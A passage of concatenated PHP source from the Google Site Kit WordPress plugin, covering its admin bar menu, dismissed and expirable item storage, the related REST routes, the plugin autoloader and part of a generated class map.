or more items to the list of expired items. * * @since 1.128.0 * * @param string $item Item to set expiration for. * @param int $expires_in_seconds TTL for the item. */ public function add( $item, $expires_in_seconds ) { $items = $this->get(); $items[ $item ] = time() + $expires_in_seconds; $this->set( $items ); } /** * Removes one or more items from the list of expirable items. * * @since 1.128.0 * * @param string $item Item to remove. */ public function remove( $item ) { $items = $this->get(); // If the item is not in expirable items, there's nothing to do. if ( ! array_key_exists( $item, $items ) ) { return; } unset( $items[ $item ] ); $this->set( $items ); } /** * Gets the value of the setting. * * @since 1.128.0 * * @return array Value set for the option, or default if not set. */ public function get() { $value = parent::get(); return is_array( $value ) ? $value : $this->get_default(); } /** * Gets the expected value type. * * @since 1.128.0 * * @return string The type name. */ protected function get_type() { return 'array'; } /** * Gets the default value. * * @since 1.128.0 * * @return array The default value. */ protected function get_default() { return array(); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.128.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $items ) { return $this->filter_expirable_items( $items ); }; } /** * Filters expirable items. * * @since 1.128.0 * * @param array $items Expirable items list. * @return array Filtered expirable items. */ private function filter_expirable_items( $items ) { $expirables = array(); if ( is_array( $items ) ) { foreach ( $items as $item => $ttl ) { if ( is_integer( $ttl ) ) { $expirables[ $item ] = $ttl; } } } return $expirables; } } <?php /** * Class Google\Site_Kit\Core\Admin_Bar\Admin_Bar * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin_Bar; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Assets\Assets; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; use Google\Site_Kit\Core\Util\Requires_Javascript_Trait; use WP_REST_Server; use WP_REST_Request; /** * Class handling the plugin's admin bar menu. * * @since 1.0.0 * @access private * @ignore */ final class Admin_Bar { use Requires_Javascript_Trait; use Method_Proxy_Trait; /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Assets Instance. * * @since 1.0.0 * @var Assets */ private $assets; /** * Modules instance. * * @since 1.4.0 * @var Modules */ private $modules; /** * Admin_Bar_Enabled instance. * * @since 1.39.0 * @var Admin_Bar_Enabled */ private $admin_bar_enabled; /** * Authentication instance. * * @since 1.120.0 * @var Authentication */ private $authentication; /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. * @param Assets $assets Optional. Assets API instance. Default is a new instance. * @param Modules $modules Optional. Modules instance. Default is a new instance. */ public function __construct( Context $context, ?Assets $assets = null, ?Modules $modules = null ) { $this->context = $context; $this->assets = $assets ?: new Assets( $this->context ); $this->modules = $modules ?: new Modules( $this->context ); $options = new Options( $this->context ); $this->admin_bar_enabled = new Admin_Bar_Enabled( $options ); $this->authentication = new Authentication( $this->context ); } /** * Registers functionality through WordPress hooks. * * @since 1.0.0 */ public function register() { add_action( 'admin_bar_menu', $this->get_method_proxy( 'add_menu_button' ), 99 ); add_action( 'admin_enqueue_scripts', $this->get_method_proxy( 'enqueue_assets' ), 40 ); add_action( 'wp_enqueue_scripts', $this->get_method_proxy( 'enqueue_assets' ), 40 ); // TODO: This can be removed at some point, see https://github.com/ampproject/amp-wp/pull/4001. add_filter( 'amp_dev_mode_element_xpaths', array( $this, 'add_amp_dev_mode' ) ); add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $routes ) { return array_merge( $routes, array( '/' . REST_Routes::REST_ROOT . '/core/site/data/admin-bar-settings', ) ); } ); $this->admin_bar_enabled->register(); } /** * Add data-ampdevmode attributes to the elements that need it. * * @see \Google\Site_Kit\Core\Assets\Assets::get_assets() The 'googlesitekit' string is added to all inline scripts. * @see \Google\Site_Kit\Core\Assets\Assets::add_amp_dev_mode_attributes() The data-ampdevmode attribute is added to registered scripts/styles here. * * @param string[] $xpath_queries XPath queries for elements that should get the data-ampdevmode attribute. * @return string[] XPath queries. */ public function add_amp_dev_mode( $xpath_queries ) { $xpath_queries[] = '//script[ contains( text(), "googlesitekit" ) ]'; return $xpath_queries; } /** * Render the Adminbar button. * * @since 1.0.0 * * @param object $wp_admin_bar The WP AdminBar object. */ private function add_menu_button( $wp_admin_bar ) { if ( ! $this->is_active() ) { return; } $args = array( 'id' => 'google-site-kit', 'title' => '<span class="googlesitekit-wp-adminbar__icon"></span> <span class="googlesitekit-wp-adminbar__label">Site Kit</span>', 'href' => '#', 'meta' => array( 'class' => 'menupop googlesitekit-wp-adminbar', ), ); if ( $this->context->is_amp() && ! $this->is_amp_dev_mode() ) { $post = get_post(); if ( ! $post || ! current_user_can( 'edit_post', $post->ID ) ) { return; } $args['href'] = add_query_arg( 'googlesitekit_adminbar_open', 'true', get_edit_post_link( $post->ID ) ); } else { $args['meta']['html'] = $this->menu_markup(); } $wp_admin_bar->add_node( $args ); } /** * Checks if admin bar menu is active and displaying. * * @since 1.0.0 * * @return bool True if Admin bar should display, False when it's not. */ public function is_active() { // Only active if the admin bar is showing. if ( ! is_admin_bar_showing() ) { return false; } // In the admin, never show the admin bar except for the post editing screen. if ( is_admin() && ! $this->is_admin_post_screen() ) { return false; } if ( ! current_user_can( Permissions::VIEW_ADMIN_BAR_MENU ) ) { return false; } $enabled = $this->admin_bar_enabled->get(); if ( ! $enabled ) { return false; } // No entity was identified - don't display the admin bar menu. $entity = $this->context->get_reference_entity(); if ( ! $entity ) { return false; } // Check permissions for viewing post data. if ( in_array( $entity->get_type(), array( 'post', 'blog' ), true ) && $entity->get_id() ) { // If a post entity, check permissions for that post. if ( ! current_user_can( Permissions::VIEW_POST_INSIGHTS, $entity->get_id() ) ) { return false; } } $current_url = $entity->get_url(); /** * Filters whether the Site Kit admin bar menu should be displayed. * * The admin bar menu is only shown when there is data for the current URL and the current * user has the correct capability to view the data. Modules use this filter to indicate the * presence of valid data. * * @since 1.0.0 * * @param bool $display Whether to display the admin bar menu. * @param string $current_url The URL of the current request. */ return apply_filters( 'googlesitekit_show_admin_bar_menu', true, $current_url ); } /** * Checks if current screen is an admin edit post screen. * * @since 1.0.0 */ private function is_admin_post_screen() { $current_screen = function_exists( 'get_current_screen' ) ? get_current_screen() : false; // No screen context available. if ( ! $current_screen instanceof \WP_Screen ) { return false; } // Only show for post screens. if ( 'post' !== $current_screen->base ) { return false; } // Don't show for new post screen. if ( 'add' === $current_screen->action ) { return false; } return true; } /** * Checks whether AMP dev mode is enabled. * * This is only relevant if the current context is AMP. * * @since 1.1.0 * @since 1.120.0 Added the `data-view-only` attribute. * * @return bool True if AMP dev mode is enabled, false otherwise. */ private function is_amp_dev_mode() { return function_exists( 'amp_is_dev_mode' ) && amp_is_dev_mode(); } /** * Return the Adminbar content markup. * * @since 1.0.0 */ private function menu_markup() { // Start buffer output. ob_start(); $is_view_only = ! $this->authentication->is_authenticated(); ?> <div class="googlesitekit-plugin ab-sub-wrapper"> <?php $this->render_noscript_html(); ?> <div id="js-googlesitekit-adminbar" data-view-only="<?php echo esc_attr( $is_view_only ); ?>" class="googlesitekit-adminbar"> <?php /** * Display server rendered content before JS-based adminbar modules. * * @since 1.0.0 */ do_action( 'googlesitekit_adminbar_modules_before' ); ?> <section id="js-googlesitekit-adminbar-modules" class="googlesitekit-adminbar-modules"></section> <?php /** * Display server rendered content after JS-based adminbar modules. * * @since 1.0.0 */ do_action( 'googlesitekit_adminbar_modules_after' ); ?> </div> </div> <?php // Get the buffer output. $markup = ob_get_clean(); return $markup; } /** * Enqueues assets. * * @since 1.39.0 */ private function enqueue_assets() { if ( ! $this->is_active() ) { return; } // Enqueue styles. $this->assets->enqueue_asset( 'googlesitekit-adminbar-css' ); if ( $this->context->is_amp() && ! $this->is_amp_dev_mode() ) { // AMP Dev Mode support was added in v1.4, and if it is not enabled then short-circuit since scripts will be invalid. return; } // Enqueue scripts. $this->assets->enqueue_asset( 'googlesitekit-adminbar' ); $this->modules->enqueue_assets(); } /** * Gets related REST routes. * * @since 1.39.0 * * @return array List of REST_Route objects. */ private function get_rest_routes() { $can_authenticate = function () { return current_user_can( Permissions::AUTHENTICATE ); }; $settings_callback = function () { return array( 'enabled' => $this->admin_bar_enabled->get(), ); }; return array( new REST_Route( 'core/site/data/admin-bar-settings', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => $settings_callback, 'permission_callback' => $can_authenticate, ), array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) use ( $settings_callback ) { $data = $request->get_param( 'data' ); if ( isset( $data['enabled'] ) ) { $this->admin_bar_enabled->set( ! empty( $data['enabled'] ) ); } return $settings_callback( $request ); }, 'permission_callback' => $can_authenticate, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'enabled' => array( 'type' => 'boolean', 'required' => false, ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Admin_Bar\Admin_Bar_Enabled * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin_Bar; use Google\Site_Kit\Core\Storage\Setting; /** * Class handling the admin bar menu settings. * * @since 1.39.0 * @access private * @ignore */ class Admin_Bar_Enabled extends Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_admin_bar_menu_enabled'; /** * Gets the value of the setting. * * @since 1.39.0 * * @return bool Value set for the option, or registered default if not set. */ public function get() { return (bool) parent::get(); } /** * Gets the expected value type. * * @since 1.39.0 * * @return string The type name. */ protected function get_type() { return 'boolean'; } /** * Gets the default value. * * @since 1.39.0 * * @return boolean The default value. */ protected function get_default() { return true; } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.39.0 * * @return callable The callable sanitize callback. */ protected function get_sanitize_callback() { return 'boolval'; } } <?php /** * Class Google\Site_Kit\Core\Dismissals\Dismissed_Items * * @package Google\Site_Kit\Core\Dismissals * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Dismissals; use Closure; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class for representing a user's dismissed items. * * @since 1.37.0 * @access private * @ignore */ class Dismissed_Items extends User_Setting { /** * The user option name for this setting. * * @note This option is prefixed differently so that it will persist across disconnect/reset. */ const OPTION = 'googlesitekitpersistent_dismissed_items'; const DISMISS_ITEM_PERMANENTLY = 0; /** * Adds one or more items to the list of dismissed items. * * @since 1.37.0 * * @param string $item Item to dismiss. * @param int $expires_in_seconds TTL for the item. */ public function add( $item, $expires_in_seconds = self::DISMISS_ITEM_PERMANENTLY ) { $items = $this->get(); $items[ $item ] = $expires_in_seconds ? time() + $expires_in_seconds : 0; $this->set( $items ); } /** * Removes one or more items from the list of dismissed items. * * @since 1.107.0 * * @param string $item Item to remove. */ public function remove( $item ) { $items = $this->get(); // If the item is not in dismissed items, there's nothing to do. if ( ! array_key_exists( $item, $items ) ) { return; } unset( $items[ $item ] ); $this->set( $items ); } /** * Gets the value of the setting. * * @since 1.37.0 * * @return array Value set for the option, or default if not set. */ public function get() { $value = parent::get(); return is_array( $value ) ? $value : $this->get_default(); } /** * Gets the expected value type. * * @since 1.37.0 * * @return string The type name. */ protected function get_type() { return 'array'; } /** * Gets the default value. * * @since 1.37.0 * * @return array The default value. */ protected function get_default() { return array(); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.37.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $items ) { return $this->filter_dismissed_items( $items ); }; } /** * Determines whether the item is dismissed. * * @since 1.37.0 * * @param string $item The item to check. * @return bool TRUE if item is dismissed, otherwise FALSE. */ public function is_dismissed( $item ) { $items = $this->get(); if ( ! array_key_exists( $item, $items ) ) { return false; } $ttl = $items[ $item ]; if ( $ttl > 0 && $ttl < time() ) { return false; } return true; } /** * Gets dismissed items. * * @since 1.37.0 * * @return array Dismissed items array. */ public function get_dismissed_items() { $dismissed_items = $this->get(); $dismissed_items = $this->filter_dismissed_items( $dismissed_items ); return array_keys( $dismissed_items ); } /** * Filters dismissed items. * * @since 1.37.0 * * @param array $items Dismissed items list. * @return array Filtered dismissed items. */ private function filter_dismissed_items( $items ) { $dismissed = array(); if ( is_array( $items ) ) { foreach ( $items as $item => $ttl ) { if ( self::DISMISS_ITEM_PERMANENTLY === $ttl || $ttl > time() ) { $dismissed[ $item ] = $ttl; } } } return $dismissed; } } <?php /** * Class Google\Site_Kit\Core\Dismissals\REST_Dismissals_Controller * * @package Google\Site_Kit\Core\Dismissals * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Dismissals; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\Exception\Invalid_Param_Exception; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling dismissed items rest routes. * * @since 1.37.0 * @access private * @ignore */ class REST_Dismissals_Controller { /** * Dismissed_Items instance. * * @since 1.37.0 * @var Dismissed_Items */ protected $dismissed_items; /** * Constructor. * * @since 1.37.0 * * @param Dismissed_Items $dismissed_items Dismissed items instance. */ public function __construct( Dismissed_Items $dismissed_items ) { $this->dismissed_items = $dismissed_items; } /** * Registers functionality through WordPress hooks. * * @since 1.37.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/dismissed-items', ) ); } ); } /** * Gets REST route instances. * * @since 1.37.0 * @since 1.133.0 Added the `DELETE dismissed-items` route. * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_dismiss_item = function () { return current_user_can( Permissions::VIEW_SPLASH ) || current_user_can( Permissions::VIEW_DASHBOARD ); }; return array( new REST_Route( 'core/user/data/dismissed-items', array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->dismissed_items->get_dismissed_items() ); }, 'permission_callback' => $can_dismiss_item, ) ), new REST_Route( 'core/user/data/dismissed-items', array( 'methods' => WP_REST_Server::DELETABLE, 'callback' => function ( WP_REST_Request $request ) { if ( empty( $request['data']['slugs'] ) ) { // Schema validation does not catch empty object params // in older versions of WP. return ( new Invalid_Param_Exception( 'data' ) )->to_wp_error(); } foreach ( $request['data']['slugs'] as $slug ) { $this->dismissed_items->remove( $slug ); } return new WP_REST_Response( $this->dismissed_items->get_dismissed_items() ); }, 'permission_callback' => $can_dismiss_item, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'minProperties' => 1, 'additionalProperties' => false, 'properties' => array( 'slugs' => array( 'type' => 'array', 'required' => true, 'items' => array( 'type' => 'string', ), ), ), ), ), ), ), new REST_Route( 'core/user/data/dismiss-item', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) { $data = $request['data']; if ( empty( $data['slug'] ) ) { return new WP_Error( 'missing_required_param', /* translators: %s: Missing parameter name */ sprintf( __( 'Request parameter is empty: %s.', 'google-site-kit' ), 'slug' ), array( 'status' => 400 ) ); } $expiration = Dismissed_Items::DISMISS_ITEM_PERMANENTLY; if ( isset( $data['expiration'] ) && intval( $data['expiration'] ) > 0 ) { $expiration = $data['expiration']; } $this->dismissed_items->add( $data['slug'], $expiration ); return new WP_REST_Response( $this->dismissed_items->get_dismissed_items() ); }, 'permission_callback' => $can_dismiss_item, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Dismissals\Dismissals * * @package Google\Site_Kit\Core\Dismissals * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Dismissals; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling dismissals. * * @since 1.37.0 * @access private * @ignore */ class Dismissals { /** * Dismissed_Items instance. * * @since 1.37.0 * @var Dismissed_Items */ protected $dismissed_items; /** * REST_Dismissals_Controller instance. * * @since 1.37.0 * @var REST_Dismissals_Controller */ protected $rest_controller; /** * Constructor. * * @since 1.37.0 * * @param Context $context Plugin context. * @param User_Options $user_options Optional. User option API. Default is a new instance. */ public function __construct( Context $context, ?User_Options $user_options = null ) { $this->dismissed_items = new Dismissed_Items( $user_options ?: new User_Options( $context ) ); $this->rest_controller = new REST_Dismissals_Controller( $this->dismissed_items ); } /** * Gets the reference to the Dismissed_Items instance. * * @since 1.69.0 * * @return Dismissed_Items An instance of the Dismissed_Items class. */ public function get_dismissed_items() { return $this->dismissed_items; } /** * Registers functionality through WordPress hooks. * * @since 1.37.0 */ public function register() { $this->dismissed_items->register(); $this->rest_controller->register(); } } <?php /** * Plugin config. * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit; // Define global constants. define( 'GOOGLESITEKIT_PLUGIN_BASENAME', plugin_basename( GOOGLESITEKIT_PLUGIN_MAIN_FILE ) ); define( 'GOOGLESITEKIT_PLUGIN_DIR_PATH', plugin_dir_path( GOOGLESITEKIT_PLUGIN_MAIN_FILE ) ); /** * Loads generated class maps for autoloading. * * @since 1.0.0 * @access private */ function autoload_classes() { $class_map = array_merge( // Site Kit classes. include GOOGLESITEKIT_PLUGIN_DIR_PATH . 'includes/vendor/composer/autoload_classmap.php', // Third-party classes. include GOOGLESITEKIT_PLUGIN_DIR_PATH . 'third-party/vendor/composer/autoload_classmap.php' ); spl_autoload_register( function ( $class_instance ) use ( $class_map ) { if ( // Only handle classes defined in our class maps. isset( $class_map[ $class_instance ] ) // Only load Site Kit classes or others that exist (e.g. polyfills). && ( 0 === strpos( $class_instance, 'Google\\Site_Kit\\' ) || 0 === strpos( $class_instance, 'Google\\Site_Kit_Dependencies\\' ) || file_exists( $class_map[ $class_instance ] ) ) ) { require_once $class_map[ $class_instance ]; } }, true, true ); } autoload_classes(); /** * Loads files containing functions from generated file map. * * @since 1.0.0 * @access private */ function autoload_vendor_files() { // Third-party files. $files = require GOOGLESITEKIT_PLUGIN_DIR_PATH . 'third-party/vendor/autoload_files.php'; foreach ( $files as $file_identifier => $file ) { require_once $file; } } autoload_vendor_files(); // Initialize the plugin. Plugin::load( GOOGLESITEKIT_PLUGIN_MAIN_FILE ); <?php // autoload_classmap.php @generated by Composer $vendorDir = dirname(dirname(__FILE__)); $baseDir = dirname($vendorDir); return array( 'Composer\\InstalledVersions' => $vendorDir . '/composer/InstalledVersions.php', 'Google\\Site_Kit\\Context' => $baseDir . '/Context.php', 'Google\\Site_Kit\\Core\\Admin\\Authorize_Application' => $baseDir . '/Core/Admin/Authorize_Application.php', 'Google\\Site_Kit\\Core\\Admin\\Available_Tools' => $baseDir . '/Core/Admin/Available_Tools.php', 'Google\\Site_Kit\\Core\\Admin\\Dashboard' => $baseDir . '/Core/Admin/Dashboard.php', 'Google\\Site_Kit\\Core\\Admin\\Notice' => $baseDir . '/Core/Admin/Notice.php', 'Google\\Site_Kit\\Core\\Admin\\Notices' => $baseDir . '/Core/Admin/Notices.php', 'Google\\Site_Kit\\Core\\Admin\\Plugin_Action_Links' => $baseDir . '/Core/Admin/Plugin_Action_Links.php', 'Google\\Site_Kit\\Core\\Admin\\Plugin_Row_Meta' => $baseDir . '/Core/Admin/Plugin_Row_Meta.php', 'Google\\Site_Kit\\Core\\Admin\\Pointer' => $baseDir . '/Core/Admin/Pointer.php', 'Google\\Site_Kit\\Core\\Admin\\Pointers' => $baseDir . '/Core/Admin/Pointers.php', 'Google\\Site_Kit\\Core\\Admin\\Screen' => $baseDir . '/Core/Admin/Screen.php', 'Google\\Site_Kit\\Core\\Admin\\Screens' => $baseDir . '/Core/Admin/Screens.php', 'Google\\Site_Kit\\Core\\Admin\\Standalone' => $baseDir . '/Core/Admin/Standalone.php', 'Google\\Site_Kit\\Core\\Admin_Bar\\Admin_Bar' => $baseDir . '/Core/Admin_Bar/Admin_Bar.php', 'Google\\Site_Kit\\Core\\Admin_Bar\\Admin_Bar_Enabled' => $baseDir . '/Core/Admin_Bar/Admin_Bar_Enabled.php', 'Google\\Site_Kit\\Core\\Assets\\Asset' => $baseDir . '/Core/Assets/Asset.php', 'Google\\Site_Kit\\Core\\Assets\\Assets' => $baseDir . '/Core/Assets/Assets.php', 'Google\\Site_Kit\\Core\\Assets\\Manifest' => $baseDir . '/Core/Assets/Manifest.php', 'Google\\Site_Kit\\Core\\Assets\\Script' => $baseDir . '/Core/Assets/Script.php', 'Google\\Site_Kit\\Core\\Assets\\Script_Data' => $baseDir . '/Core/Assets/Script_Data.php', 'Google\\Site_Kit\\Core\\Assets\\Stylesheet' => $baseDir . '/Core/Assets/Stylesheet.php', 'Google\\Site_Kit\\Core\\Authentication\\Authentication' => $baseDir . '/Core/Authentication/Authentication.php', 'Google\\Site_Kit\\Core\\Authentication\\Clients\\Client_Factory' => $baseDir . '/Core/Authentication/Clients/Client_Factory.php', 'Google\\Site_Kit\\Core\\Authentication\\Clients\\Google_Site_Kit_Client' => $baseDir . '/Core/Authentication/Clients/Google_Site_Kit_Client.php', 'Google\\Site_Kit\\Core\\Authentication\\Clients\\Google_Site_Kit_Proxy_Client' => $baseDir . '/Core/Authentication/Clients/Google_Site_Kit_Proxy_Client.php', 'Google\\Site_Kit\\Core\\Authentication\\Clients\\OAuth2' => $baseDir . '/Core/Authentication/Clients/OAuth2.php', 'Google\\Site_Kit\\Core\\Authentication\\Clients\\OAuth_Client' => $baseDir . '/Core/Authentication/Clients/OAuth_Client.php', 'Google\\Site_Kit\\Core\\Authentication\\Clients\\OAuth_Client_Base' => $baseDir . '/Core/Authentication/Clients/OAuth_Client_Base.php', 'Google\\Site_Kit\\Core\\Authentication\\Connected_Proxy_URL' => $baseDir . '/Core/Authentication/Connected_Proxy_URL.php', 'Google\\Site_Kit\\Core\\Authentication\\Credentials' => $baseDir . '/Core/Authentication/Credentials.php', 'Google\\Site_Kit\\Core\\Authentication\\Disconnected_Reason' => $baseDir . '/Core/Authentication/Disconnected_Reason.php', 'Google\\Site_Kit\\Core\\Authentication\\Exception\\Exchange_Site_Code_Exception' => $baseDir . '/Core/Authentication/Exception/Exchange_Site_Code_Exception.php', 'Google\\Site_Kit\\Core\\Authentication\\Exception\\Google_OAuth_Exception' => $baseDir . '/Core/Authentication/Exception/Google_OAuth_Exception.php', 'Google\\Site_Kit\\Core\\Authentication\\Exception\\Google_Proxy_Code_Exception' => $baseDir . '/Core/Authentication/Exception/Google_Proxy_Code_Exception.php', 'Google\\Site_Kit\\Core\\Authentication\\Exception\\Insufficient_Scopes_Exception' => $baseDir . '/Core/Authentication/Exception/Insufficient_Scopes_Exception.php', 'Google\\Site_Kit\\Core\\Authentication\\Exception\\Missing_Verification_Exception' => $baseDir . '/Core/Authentication/Exception/Missing_Verification_Exception.php', 'Google\\Site_Kit\\Core\\Authentication\\Google_Proxy' => $baseDir . '/Core/Authentication/Google_Proxy.php', 'Google\\Site_Kit\\Core\\Authentication\\Guards\\Site_Connected_Guard' => $baseDir . '/Core/Authentication/Guards/Site_Connected_Guard.php', 'Google\\Site_Kit\\Core\\Authentication\\Guards\\Using_Proxy_Connection_Guard' => $baseDir . '/Core/Authentication/Guards/Using_Proxy_Connection_Guard.php', 'Google\\Site_Kit\\Core\\Authentication\\Has_Connected_Admins' => $baseDir . '/Core/Authentication/Has_Connected_Admins.php', 'Google\\Site_Kit\\Core\\Authentication\\Has_Multiple_Admins' => $baseDir . '/Core/Authentication/Has_Multiple_Admins.php', 'Google\\Site_Kit\\Core\\Authentication\\Initial_Version' => $baseDir . '/Core/Authentication/Initial_Version.php', 'Google\\Site_Kit\\Core\\Authentication\\Owner_ID' => $baseDir . '/Core/Authentication/Owner_ID.php', 'Google\\Site_Kit\\Core\\Authentication\\Profile' => $baseDir . '/Core/Authentication/Profile.php', 'Google\\Site_Kit\\Core\\Authentication\\REST_Authentication_Controller' => $baseDir . '/Core/Authentication/REST_Authentication_Controller.php', 'Google\\Site_Kit\\Core\\Authentication\\Setup' => $baseDir . '/Core/Authentication/Setup.php', 'Google\\Site_Kit\\Core\\Authentication\\Token' => $baseDir . '/Core/Authentication/Token.php', 'Google\\Site_Kit\\Core\\Authentication\\Verification' => $baseDir . '/Core/Authentication/Verification.php', 'Google\\Site_Kit\\Core\\Authentication\\Verification_File' => $baseDir . '/Core/Authentication/Verification_File.php', 'Google\\Site_Kit\\Core\\Authentication\\Verification_Meta' => $baseDir . '/Core/Authentication/Verification_Meta.php', 'Google\\Site_Kit\\Core\\CLI\\Authentication_CLI_Command' => $baseDir . '/Core/CLI/Authentication_CLI_Command.php', 'Google\\Site_Kit\\Core\\CLI\\CLI_Command' => $baseDir . '/Core/CLI/CLI_Command.php', 'Google\\Site_Kit\\Core\\CLI\\CLI_Commands' => $baseDir . '/Core/CLI/CLI_Commands.php', 'Google\\Site_Kit\\Core\\CLI\\Reset_CLI_Command' => $baseDir . '/Core/CLI/Reset_CLI_Command.php', 'Google\\Site_Kit\\Core\\Consent_Mode\\Consent_Mode' => $baseDir . '/Core/Consent_Mode/Consent_Mode.php', 'Google\\Site_Kit\\Core\\Consent_Mode\\Consent_Mode_Settings' => $baseDir . '/Core/Consent_Mode/Consent_Mode_Settings.php', 'Google\\Site_Kit\\Core\\Consent_Mode\\REST_Consent_Mode_Controller' => $baseDir . '/Core/Consent_Mode/REST_Consent_Mode_Controller.php', 'Google\\Site_Kit\\Core\\Consent_Mode\\Regions' => $baseDir . '/Core/Consent_Mode/Regions.php', 'Google\\Site_Kit\\Core\\Contracts\\WP_Errorable' => $baseDir . '/Core/Contracts/WP_Errorable.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Event_Providers\\Contact_Form_7' => $baseDir . '/Core/Conversion_Tracking/Conversion_Event_Providers/Contact_Form_7.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Event_Providers\\Easy_Digital_Downloads' => $baseDir . '/Core/Conversion_Tracking/Conversion_Event_Providers/Easy_Digital_Downloads.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Event_Providers\\Mailchimp' => $baseDir . '/Core/Conversion_Tracking/Conversion_Event_Providers/Mailchimp.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Event_Providers\\Ninja_Forms' => $baseDir . '/Core/Conversion_Tracking/Conversion_Event_Providers/Ninja_Forms.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Event_Providers\\OptinMonster' => $baseDir . '/Core/Conversion_Tracking/Conversion_Event_Providers/OptinMonster.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Event_Providers\\PopupMaker' => $baseDir . '/Core/Conversion_Tracking/Conversion_Event_Providers/PopupMaker.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Event_Providers\\WPForms' => $baseDir . '/Core/Conversion_Tracking/Conversion_Event_Providers/WPForms.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Event_Providers\\WooCommerce' => $baseDir . '/Core/Conversion_Tracking/Conversion_Event_Providers/WooCommerce.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Events_Provider' => $baseDir . '/Core/Conversion_Tracking/Conversion_Events_Provider.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Tracking' => $baseDir . '/Core/Conversion_Tracking/Conversion_Tracking.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\Conversion_Tracking_Settings' => $baseDir . '/Core/Conversion_Tracking/Conversion_Tracking_Settings.php', 'Google\\Site_Kit\\Core\\Conversion_Tracking\\REST_Conversion_Tracking_Controller' => $baseDir . '/Core/Conversion_Tracking/REST_Conversion_Tracking_Controller.php', 'Google\\Site_Kit\\Core\\Dashboard_Sharing\\Dashboard_Sharing' => $baseDir . '/Core/Dashboard_Sharing/Dashboard_Sharing.php', 'Google\\Site_Kit\\Core\\Dashboard_Sharing\\View_Only_Pointer' => $baseDir . '/Core/Dashboard_Sharing/View_Only_Pointer.php', 'Google\\Site_Kit\\Core\\Dismissals\\Dismissals' => $baseDir . '/Core/Dismissals/Dismissals.php', 'Google\\Site_Kit\\Core\\Dismissals\\Dismissed_Items' => $baseDir . '/Core/Dismissals/Dismissed_Items.php', 'Google\\Site_Kit\\Core\\Dismissals\\REST_Dismissals_Controller' => $baseDir . '/Core/Dismissals/REST_Dismissals_Controller.php', 'Google\\Site_Kit\\Core\\Email\\Email' => $baseDir . '/Core/Email/Email.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Eligible_Subscribers_Query' => $baseDir . '/Core/Email_Reporting/Eligible_Subscribers_Query.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Log' => $baseDir . '/Core/Email_Reporting/Email_Log.php', 'Google\\Site_Kit\\Core\\Email_Reporting\\Email_Log_Batch_Query' => $baseDir . 